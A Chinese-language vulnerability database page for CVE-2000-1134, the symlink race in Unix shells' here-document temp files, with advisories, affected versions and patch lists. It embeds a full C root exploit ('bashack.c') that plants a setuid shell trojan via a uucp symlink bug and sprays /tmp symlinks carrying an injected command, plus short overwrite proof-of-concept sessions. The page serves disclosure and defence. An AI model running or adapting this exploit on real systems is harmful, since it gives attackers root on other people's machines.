CVE-2000-1134
CVSS7.2
发布时间 :2001-01-09 00:00:00
修订时间 :2016-10-17 22:08:48
NMCOES    

[原文]Multiple shell programs on various Unix systems, including (1) tcsh, (2) csh, (3) sh, and (4) bash, follow symlinks when processing << redirects (aka here-documents or in-here documents), which allows local users to overwrite files of other users via a symlink attack.


[CNNVD]Unix Shell Redirection竞态条件漏洞(CNNVD-200101-072)

        多种Unix系统中的多个shell程序,包括:(1)tcsh,(2)csh,(3)sh,和(4)bash在处理<< 重新传送(又称为here-documents或者in-here documents)时后缀符号链接,本地用户借助一个符号链接攻击覆盖其他用户的文件。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:redhat:linux:6.0Red Hat Linux 6.0
cpe:/a:immunix:immunix:6.2
cpe:/o:redhat:linux:5.2Red Hat Linux 5.2
cpe:/o:redhat:linux:6.1Red Hat Linux 6.1
cpe:/o:redhat:linux:6.2Red Hat Linux 6.2
cpe:/o:conectiva:linux:4.1Conectiva Conectiva Linux 4.1
cpe:/o:conectiva:linux:5.0Conectiva Conectiva Linux 5.0
cpe:/o:caldera:openlinux_eserver:2.3
cpe:/o:conectiva:linux:4.0Conectiva Conectiva Linux 4.0
cpe:/o:conectiva:linux:4.0esConectiva Conectiva Linux 4.0es
cpe:/o:conectiva:linux:4.2Conectiva Conectiva Linux 4.2
cpe:/o:conectiva:linux:5.1Conectiva Conectiva Linux 5.1
cpe:/o:suse:suse_linux:7.0SuSE SuSE Linux 7.0
cpe:/o:mandrakesoft:mandrake_linux:6.1MandrakeSoft Mandrake Linux 6.1
cpe:/o:mandrakesoft:mandrake_linux:7.0MandrakeSoft Mandrake Linux 7.0
cpe:/o:caldera:openlinux_edesktop:2.4
cpe:/o:mandrakesoft:mandrake_linux:7.2MandrakeSoft Mandrake Linux 7.2
cpe:/o:mandrakesoft:mandrake_linux:6.0MandrakeSoft Mandrake Linux 6.0
cpe:/o:mandrakesoft:mandrake_linux:7.1MandrakeSoft Mandrake Linux 7.1
cpe:/o:caldera:openlinux
cpe:/o:hp:hp-ux:11.11HP-UX 11.11
cpe:/o:redhat:linux:6.2eRed Hat Linux 6.2E

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:4047Shell Redirect Symlink Attack Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1134
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1134
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200101-072
(官方数据源) CNNVD

- 其它链接及资源

ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:76.tcsh-csh.asc
(VENDOR_ADVISORY)  FREEBSD  FreeBSD-SA-00:76
ftp://patches.sgi.com/support/free/security/advisories/20011103-02-P
(UNKNOWN)  SGI  20011103-02-P
http://archives.neohapsis.com/archives/bugtraq/2000-10/0418.html
(UNKNOWN)  BUGTRAQ  20001028 tcsh: unsafe tempfile in << redirects
http://archives.neohapsis.com/archives/tru64/2002-q1/0009.html
(UNKNOWN)  COMPAQ  SSRT1-41U
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000350
(UNKNOWN)  CONECTIVA  CLA-2000:350
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000354
(UNKNOWN)  CONECTIVA  CLSA-2000:354
http://marc.info/?l=bugtraq&m=97561816504170&w=2
(UNKNOWN)  BUGTRAQ  20001130 [ADV/EXP]: RH6.x root from bash /tmp vuln + MORE
http://www.calderasystems.com/support/security/advisories/CSSA-2000-042.0.txt
(UNKNOWN)  CALDERA  CSSA-2000-042.0
http://www.calderasystems.com/support/security/advisories/CSSA-2000-043.0.txt
(UNKNOWN)  CALDERA  CSSA-2000-043.0
http://www.debian.org/security/2000/20001111a
(UNKNOWN)  DEBIAN  20001111a
http://www.kb.cert.org/vuls/id/10277
(UNKNOWN)  CERT-VN  VU#10277
http://www.linux-mandrake.com/en/security/MDKSA-2000-069.php3
(UNKNOWN)  MANDRAKE  MDKSA-2000-069
http://www.linux-mandrake.com/en/security/MDKSA-2000-075.php3
(UNKNOWN)  MANDRAKE  MDKSA-2000:075
http://www.redhat.com/support/errata/RHSA-2000-117.html
(UNKNOWN)  REDHAT  RHSA-2000:117
http://www.redhat.com/support/errata/RHSA-2000-121.html
(UNKNOWN)  REDHAT  RHSA-2000:121
http://www.securityfocus.com/archive/1/146657
(UNKNOWN)  BUGTRAQ  20001128 /bin/sh creates insecure tmp files
http://www.securityfocus.com/bid/1926
(UNKNOWN)  BID  1926
http://www.securityfocus.com/bid/2006
(VENDOR_ADVISORY)  BID  2006

- 漏洞信息

Unix Shell Redirection竞态条件漏洞
高危 竞争条件
2001-01-09 00:00:00 2006-09-15 00:00:00
本地  
        多种Unix系统中的多个shell程序,包括:(1)tcsh,(2)csh,(3)sh,和(4)bash在处理<< 重新传送(又称为here-documents或者in-here documents)时后缀符号链接,本地用户借助一个符号链接攻击覆盖其他用户的文件。

- 公告与补丁

        HP have released a security bulletin to address this issue in HP-UX. Customers who are affected by this issue are advised to apply appropriate patches as soon as possible. See referenced advisory for further detail regarding applying fixes. This bulletin has been revised to include fixes for HP-UX 11.04.
        Sun has released an alert containing fixes to address this issue.
        Sun has also released fixes for RaQ4, Qube3 and RaQXTR.
        Various upgrades and patches have been made available:
        Sun Cobalt RaQ4 Japanese RAID 3100R-ja
        
        Sun Cobalt RaQ 4
        
        RedHat bash-1.14.7-16.i386.rpm
        
        RedHat bash-1.14.7-22.i386.rpm
        
        Sun Solaris 8
        
        Sun Cobalt Qube3 4000WG
        
        Sun Cobalt Qube3 w/ Caching and RAID 4100WG
        
        Sun Cobalt RaQ4 3001R
        
        Sun Cobalt RaQ XTR 3500R
        
        Sun Cobalt Qube3 Japanese w/ Caching and RAID 4100WGJ
        
        RedHat bash-1.14.7-13.i386.rpm
        
        Conectiva Linux graficas
        
        Sun Cobalt RaQ XTR Japanese 3500R-ja
        
        Conectiva Linux ecommerce
        
        Sun Cobalt Qube3 w/Caching 4010WG
        
        Sun Cobalt RaQ XTR
        
        Sun Cobalt Qube3 Japanese 4000WGJ
        
        Sun Cobalt Qube3 Japanese w/Caching 4010WGJ
        
        Sun Cobalt Qube 3
        
        HP HP-UX 10.20
        
        HP HP-UX 11.0 4
        
        HP HP-UX 11.0
        
        HP HP-UX 11.11
        
        Caldera OpenLinux Desktop 2.3
        

- 漏洞信息 (217)

UUCP Exploit - file creation/overwriting (symlinks) (EDBID:217)
linux local
2000-12-04 Verified
0 t--zen
N/A [点击下载]
/**************************************************************

root exploit: multiple subsystem errors allowing root exploit

bashack.c - Thu Nov 30 21:50:50 NZDT 2000 (redhat 6.1)

 /etc/rc.d/ and scripts that are trusting the untrustworthy.
 /bin/sh acts silly when u get it to use the << redirection.
 it creates a mode 666 file with an easily predictable name,
 containing the pid as the only variant. As the same sequence
 of events happens at most start ups, the pid of the line in
 /etc/rc.d/rc.sysinit that creates the /boot/kernel.h file 
 which uses << can be exploited. With another bit of bad
 it will take until the next run of cron.weekly till you
 have root. I'm sure someone can come up with a faster way.
 (hint: lotsa stuff run as root have /sbin and /usr/sbin  
 in their paths. / is a pain when backticking, making it
 hard to tell the program what to run... FNAME below is
 a method of getting around that, but its ugly as sin ;])


[root@continuity /root]# rpm -qf /usr/bin/uucp
uucp-1.06.1-20
[root@continuity /root]# rpm -qf /etc/rc.d/rc3.d
chkconfig-1.0.7-2
initscripts-4.48-1
[root@continuity /root]# rpm -qf /bin/bash
bash-1.14.7-16
[root@continuity /root]# rpm -qf /etc/cron.weekly/makewhatis.cron
man-1.5g-6

The big bug is like the tcsh one someone mentioned a while ago.

*****************************************************************/
#include <stdlib.h>
#include <stdio.h>
#define FNAME "/usr/man/man1/last.1.gz;export PATH=.;cd ..;cd ..;cd ..;cd ..;cd usr;cd sbin;uuconv;.1.gz"

main()
{
 int d;
  char fn[2000];
  char *homedir;
  FILE *file;
  printf("bashack - root using multiple config/input validation errors\n\n");
  printf("creating trojan in /usr/sbin/uuconv\n");
  printf("                 - uucp bug -\n");
  printf("uucp follows symlinks as euid=uucp, (uid,gid,egid=you)\n\n");
  homedir=getenv("HOME");
  sprintf(fn,"%s/bashacker/",homedir);
  mkdir(fn);
  chdir(fn);
  sprintf(fn,"%s/bashacker/bashaker",homedir);
  unlink(fn);
  printf("== uuconv replacement\n");
  printf("* making uuconv.c\n");
  sprintf(fn,"%s/bashacker/uuconv.c",homedir);
  file=fopen(fn,"w");
  sprintf(fn,"%s/bashacker",homedir);
  fprintf(file,"main()\n{\n");
  fprintf(file,"printf(\"sendmail\n\");\n");
  fprintf(file,"system(\"/bin/cp /bin/bash %s/bashacker;",fn);
  fprintf(file,"/bin/chmod 6711 %s/bashacker;",fn);
  fprintf(file,"echo hacked by %s>>/etc/motd;",getenv("LOGNAME"));
  fprintf(file,"echo -n \\\"at about \\\" >>/etc/motd; /bin/date >>/etc/motd");
  fprintf(file,"\");\n");
  fprintf(file,"}\n");
  fclose(file);
  printf("* compiling ./uuconv.c ==> ./uuconv \n");
  system("cc -o uuconv uuconv.c -O2;strip uuconv");
  unlink("/var/spool/uucppublic/uuconv"); 
  symlink("/usr/sbin/uuconv","/var/spool/uucppublic/uuconv");
  printf("* copying to /usr/sbin via uucp bug\n");
  sprintf(fn,
  "/usr/bin/uucp %s/bashacker/uuconv /var/spool/uucppublic/uuconv",homedir);
  system(fn);
  printf("== cleaning up a little.\n");
  unlink("/var/spool/uucppublic/uuconv");
  unlink("uuconv");
  unlink("uuconv.c");
  printf("== set up /tmp for bash part of exploit.\n");
  for(d=100;d<150;d++)
  /*
   on my machine its something like 118-120 or something, but it does
   depend on what was running, or what files existed and stuff.
   so please excuse the shotgun approach.
  */
  {
  sprintf(fn,"/tmp/t%d-sh",d);
  unlink(fn);
  symlink(FNAME,fn);
  } 
  printf("* my work here is done.\n\n");
  printf("now pray for some kinda of crash.\n\n\t--zen\n");
}


// milw0rm.com [2000-12-04]
		

- 漏洞信息 (20436)

Mac OS X 10,HP-UX 9/10/11,Mandriva 6/7,RedHat 5/6,SCO 5,IRIX 6 Shell Redirection Race Condition (EDBID:20436)
unix local
2000-01-02 Verified
0 proton
N/A [点击下载]
source: http://www.securityfocus.com/bid/2006/info

bash, tcsh, cash, ksh and sh are all variations of the Unix shell distributed with many Unix and Unix clone operating systems. A vulnerability exists in these shells that could allow an attacker to arbitrarily write to files.

A vulnerability has been discovered in a number of Unix shells which may allow a local attacker to corrupt files or potentially elevate privileges.

Scripts and command line operations using << as a redirection operator create files in the /tmp directory with a predictable naming convention. Additionally, files are created in the /tmp directory without first checking if the file already exists.

This could result in a symbolic link attack that could be used to corrupt any file that the owner of the redirecting shell has access to write to. This issue affects those systems running vulnerable versions of bash, tcsh, cash, ksh and sh.

ksh is reportedly not vulnerable for IBM AIX systems. 

#!/bin/ksh -x
touch /tmp/silly.1
ln -s /tmp/silly.1 /tmp/sh$$.1
ls -l /tmp/silly.* /tmp/sh$$.*
cat <<EOF
Just some short text
EOF
ls -l /tmp/silly.* /tmp/sh$$.*
rm /tmp/silly.* /tmp/sh$$.*

This example was submitted by proton <proton@energymech.net> in an October 29th, 2001 BugTraq posting:

/tmp# echo 'hello world' > rootfile
/tmp# chmod 600 rootfile
/tmp# ln -s rootfile sh$$
/tmp# chown -h 666.666 sh$$
/tmp# ls -l rootfile sh$$
-rw------- 1 root root 12 Oct 29 03:55 rootfile
lrwxrwxrwx 1 666 666 8 Oct 29 03:56 sh12660 ->
rootfile
/tmp# cat <<BAR
? FOO
? BAR
FOO
o world
/tmp# ls -l rootfile sh$$
/bin/ls: sh12660: No such file or directory
-rw------- 1 root root 12 Oct 29 03:56 rootfile
/tmp# cat rootfile
FOO
o world
/tmp#		

- 漏洞信息

14158
Multiple Unix Shell << Redirect Symlink Arbitrary File Overwrite

- 漏洞描述

- 时间线

Unknow Unknow
Unknow Unknow

- 解决方案

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Unix Shell Redirection Race Condition Vulnerability
Race Condition Error 2006
No Yes
2000-01-02 12:00:00 2009-07-11 03:56:00
This issue for bash and ksh was discovered and posted to BugTraq by Paul Szabo <psz@maths.usyd.edu.au>. The tcsh variation was posted to BugTraq by proton <proton@energymech.net>. This vulnerability was originally discovered by Gordon Irlam.

- 受影响的程序版本

Wirex Immunix OS 6.2
tcsh tcsh 6.9 .00
tcsh tcsh 6.8 .00
tcsh tcsh 6.7.2
Sun Solaris 2.5.1 _x86
Sun Solaris 2.5.1
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6
Sun Solaris 2.5_x86
Sun Solaris 2.5
Sun Cobalt RaQ4 RAID 3100R
Sun Cobalt RaQ4 Japanese RAID 3100R-ja
Sun Cobalt RaQ4 3001R
Sun Cobalt RaQ XTR Japanese 3500R-ja
Sun Cobalt RaQ XTR 3500R
Sun Cobalt RaQ XTR
Sun Cobalt RaQ 4
Sun Cobalt Qube3 w/Caching 4010WG
Sun Cobalt Qube3 w/ Caching and RAID 4100WG
Sun Cobalt Qube3 Japanese w/Caching 4010WGJ
Sun Cobalt Qube3 Japanese w/ Caching and RAID 4100WGJ
Sun Cobalt Qube3 Japanese 4000WGJ
Sun Cobalt Qube3 4000WG
Sun Cobalt Qube 3
SGI IRIX 6.5.13 m
SGI IRIX 6.5.13 f
SGI IRIX 6.5.13
SGI IRIX 6.5.12 m
SGI IRIX 6.5.12 f
SGI IRIX 6.5.12
SGI IRIX 6.5.11 m
SGI IRIX 6.5.11 f
SGI IRIX 6.5.11
SGI IRIX 6.5.10 m
SGI IRIX 6.5.10 f
SGI IRIX 6.5.10
SGI IRIX 6.5.9
SGI IRIX 6.5.8
SGI IRIX 6.5.7
SGI IRIX 6.5.6
SGI IRIX 6.5.5
SGI IRIX 6.5.4
SGI IRIX 6.5.3
SGI IRIX 6.5.2
SGI IRIX 6.5.1
SGI IRIX 6.5
SCO Open Server 5.0.6 a
SCO Open Server 5.0.6
SCO Open Server 5.0.5
SCO Open Server 5.0.4
SCO Open Server 5.0.3
SCO Open Server 5.0.2
SCO Open Server 5.0.1
SCO Open Server 5.0
SCO eServer 2.3
SCO eDesktop 2.4
S.u.S.E. Linux 7.0
RedHat Linux 6.2 E sparc
RedHat Linux 6.2 E i386
RedHat Linux 6.2 E alpha
RedHat Linux 6.2 sparc
RedHat Linux 6.2 i386
RedHat Linux 6.2 alpha
RedHat Linux 6.1 sparc
RedHat Linux 6.1 i386
RedHat Linux 6.1 alpha
RedHat Linux 6.0 sparc
RedHat Linux 6.0 alpha
RedHat Linux 6.0
RedHat Linux 5.2 sparc
RedHat Linux 5.2 i386
RedHat Linux 5.2 alpha
RedHat bash-1.14.7-22.i386.rpm
+ Red Hat Linux 6.2
RedHat bash-1.14.7-16.i386.rpm
+ RedHat Linux 6.0
RedHat bash-1.14.7-13.i386.rpm
+ RedHat Linux 5.2
Netscape Communicator 6.01a
- Sun Solaris 8_sparc
- Sun Solaris 7.0
Mandriva Linux Mandrake 7.2
Mandriva Linux Mandrake 7.1
Mandriva Linux Mandrake 7.0
Mandriva Linux Mandrake 6.1
Mandriva Linux Mandrake 6.0
HP HP-UX 11.11
HP HP-UX 11.0 4
HP HP-UX 11.0
HP HP-UX 10.20
HP HP-UX 9.0
FreeBSD FreeBSD 5.0
FreeBSD FreeBSD 4.2
FreeBSD FreeBSD 3.5.1
Digital (Compaq) TRU64/DIGITAL UNIX 5.0
Conectiva Linux 5.1
Conectiva Linux 5.0
Conectiva Linux 4.2
Conectiva Linux 4.1
Conectiva Linux 4.0 es
Conectiva Linux 4.0
Conectiva Linux graficas
Conectiva Linux ecommerce
Compaq Tru64 5.1 a
Compaq Tru64 5.1
Compaq Tru64 5.0 a
Compaq Tru64 5.0
Compaq Tru64 4.0 g
Compaq Tru64 4.0 f
Compaq Tru64 4.0 d
Caldera OpenLinux Desktop 2.3
Apple Mac OS X 10.0.4
Apple Mac OS X 10.0.3
Apple Mac OS X 10.0.2
Apple Mac OS X 10.0.1
Apple Mac OS X 10.0
Sun Solaris 8_sparc
SGI IRIX 6.5.14 m
SGI IRIX 6.5.14 f
SGI IRIX 6.5.14
IBM AIX 4.3.3
HP HP-UX 11.0
Apple Mac OS X 10.1

- 不受影响的程序版本

Sun Solaris 8_sparc
SGI IRIX 6.5.14 m
SGI IRIX 6.5.14 f
SGI IRIX 6.5.14
IBM AIX 4.3.3
HP HP-UX 11.0
Apple Mac OS X 10.1

- 漏洞讨论

bash, tcsh, cash, ksh and sh are all variations of the Unix shell distributed with many Unix and Unix clone operating systems. A vulnerability exists in these shells that could allow an attacker to arbitrarily write to files.

A vulnerability has been discovered in a number of Unix shells which may allow a local attacker to corrupt files or potentially elevate privileges.

Scripts and command line operations using &lt;&lt; as a redirection operator create files in the /tmp directory with a predictable naming convention. Additionally, files are created in the /tmp directory without first checking if the file already exists.

This could result in a symbolic link attack that could be used to corrupt any file that the owner of the redirecting shell has access to write to. This issue affects those systems running vulnerable versions of bash, tcsh, cash, ksh and sh.

ksh is reportedly not vulnerable for IBM AIX systems.

- 漏洞利用

This example was contributed by Paul Szabo &lt;psz@maths.usyd.edu.au&gt; :

#!/bin/ksh -x
touch /tmp/silly.1
ln -s /tmp/silly.1 /tmp/sh$$.1
ls -l /tmp/silly.* /tmp/sh$$.*
cat &lt;&lt;EOF
Just some short text
EOF
ls -l /tmp/silly.* /tmp/sh$$.*
rm /tmp/silly.* /tmp/sh$$.*

This example was submitted by proton &lt;proton@energymech.net&gt; in an October 29th, 2001 BugTraq posting:

/tmp# echo 'hello world' &gt; rootfile
/tmp# chmod 600 rootfile
/tmp# ln -s rootfile sh$$
/tmp# chown -h 666.666 sh$$
/tmp# ls -l rootfile sh$$
-rw------- 1 root root 12 Oct 29 03:55 rootfile
lrwxrwxrwx 1 666 666 8 Oct 29 03:56 sh12660 -&gt;
rootfile
/tmp# cat &lt;&lt;BAR
? FOO
? BAR
FOO
o world
/tmp# ls -l rootfile sh$$
/bin/ls: sh12660: No such file or directory
-rw------- 1 root root 12 Oct 29 03:56 rootfile
/tmp# cat rootfile
FOO
o world
/tmp#

Zenith Parsec &lt;zenith_parsec@the-astronaut.com&gt; submitted an exploit for bash on Linux systems.

- 解决方案

HP have released a security bulletin to address this issue in HP-UX. Customers who are affected by this issue are advised to apply appropriate patches as soon as possible. See referenced advisory for further detail regarding applying fixes. This bulletin has been revised to include fixes for HP-UX 11.04.

Sun has released an alert containing fixes to address this issue.

Sun has also released fixes for RaQ4, Qube3 and RaQXTR.

Various upgrades and patches have been made available:


Sun Cobalt RaQ4 Japanese RAID 3100R-ja

Sun Cobalt RaQ 4

RedHat bash-1.14.7-16.i386.rpm

RedHat bash-1.14.7-22.i386.rpm

Sun Solaris 8_sparc

Sun Solaris 2.5

Sun Cobalt Qube3 4000WG

Sun Cobalt Qube3 w/ Caching and RAID 4100WG

Sun Cobalt RaQ4 3001R

Sun Solaris 2.6

Sun Cobalt RaQ XTR 3500R

Sun Cobalt Qube3 Japanese w/ Caching and RAID 4100WGJ

RedHat bash-1.14.7-13.i386.rpm

Conectiva Linux graficas

Sun Cobalt RaQ XTR Japanese 3500R-ja

Sun Solaris 2.5_x86

Conectiva Linux ecommerce

Sun Cobalt Qube3 w/Caching 4010WG

Sun Solaris 2.6_x86

Sun Cobalt RaQ XTR

Sun Cobalt Qube3 Japanese 4000WGJ

Sun Cobalt Qube3 Japanese w/Caching 4010WGJ

Sun Solaris 7.0

Sun Cobalt Qube 3

Sun Solaris 7.0_x86

HP HP-UX 10.20

HP HP-UX 11.0 4

HP HP-UX 11.0

HP HP-UX 11.11

Caldera OpenLinux Desktop 2.3

SCO eServer 2.3

SCO eDesktop 2.4

Sun Solaris 2.5.1 _x86

FreeBSD FreeBSD 3.5.1

Conectiva Linux 4.0

Compaq Tru64 4.0 f

Conectiva Linux 4.0 es

Compaq Tru64 4.0 g

Compaq Tru64 4.0 d

Conectiva Linux 4.1

Conectiva Linux 4.2

FreeBSD FreeBSD 4.2

Conectiva Linux 5.0

FreeBSD FreeBSD 5.0

Compaq Tru64 5.0

Compaq Tru64 5.0 a

SCO Open Server 5.0

SCO Open Server 5.0.1

SCO Open Server 5.0.3

SCO Open Server 5.0.4

SCO Open Server 5.0.5

SCO Open Server 5.0.6 a

SCO Open Server 5.0.6

Compaq Tru64 5.1 a

Compaq Tru64 5.1

RedHat Linux 5.2 alpha

RedHat Linux 5.2 i386

RedHat Linux 6.0 alpha

RedHat Linux 6.0

Mandriva Linux Mandrake 6.0

RedHat Linux 6.1 sparc

RedHat Linux 6.1 alpha

RedHat Linux 6.1 i386

RedHat Linux 6.2 alpha

RedHat Linux 6.2 E alpha

RedHat Linux 6.2 i386

RedHat Linux 6.2 E i386

RedHat Linux 6.2 E sparc

Wirex Immunix OS 6.2

SGI IRIX 6.5

SGI IRIX 6.5.1

SGI IRIX 6.5.10

SGI IRIX 6.5.10 m

SGI IRIX 6.5.10 f

SGI IRIX 6.5.11

SGI IRIX 6.5.11 m

SGI IRIX 6.5.11 f

SGI IRIX 6.5.12 f

SGI IRIX 6.5.12 m

SGI IRIX 6.5.13 f

SGI IRIX 6.5.13 m

SGI IRIX 6.5.2

SGI IRIX 6.5.3

SGI IRIX 6.5.4

SGI IRIX 6.5.5

SGI IRIX 6.5.6

SGI IRIX 6.5.7

SGI IRIX 6.5.8

tcsh tcsh 6.7.2

tcsh tcsh 6.8 .00

tcsh tcsh 6.9 .00

Mandriva Linux Mandrake 7.1

Mandriva Linux Mandrake 7.2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站